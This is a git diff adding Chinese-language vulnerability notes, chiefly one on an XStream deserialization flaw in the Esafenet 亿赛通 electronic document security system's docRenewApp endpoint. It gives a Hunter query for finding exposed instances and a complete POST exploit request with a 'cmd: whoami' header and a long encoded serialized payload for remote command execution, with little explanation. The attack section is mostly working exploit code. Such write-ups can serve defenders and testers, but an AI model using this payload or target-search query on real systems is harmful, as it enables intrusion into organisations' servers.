+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![1710086299125-e7611d63-bf75-4545-9198-b1f8360a83ba.png](./img/1GlZaQKLE2cGUVGj/1710086299125-e7611d63-bf75-4545-9198-b1f8360a83ba-948062.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fforzmhq7r1n8vnz>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统docRenewApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统docRenewApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..226146a
--- /dev/null
+++ b/亿赛通电子文档安全管理系统docRenewApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统docRenewApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统docRenewApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/d0a2xi_uNq20Xpju/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-228517.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/docRenewApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIH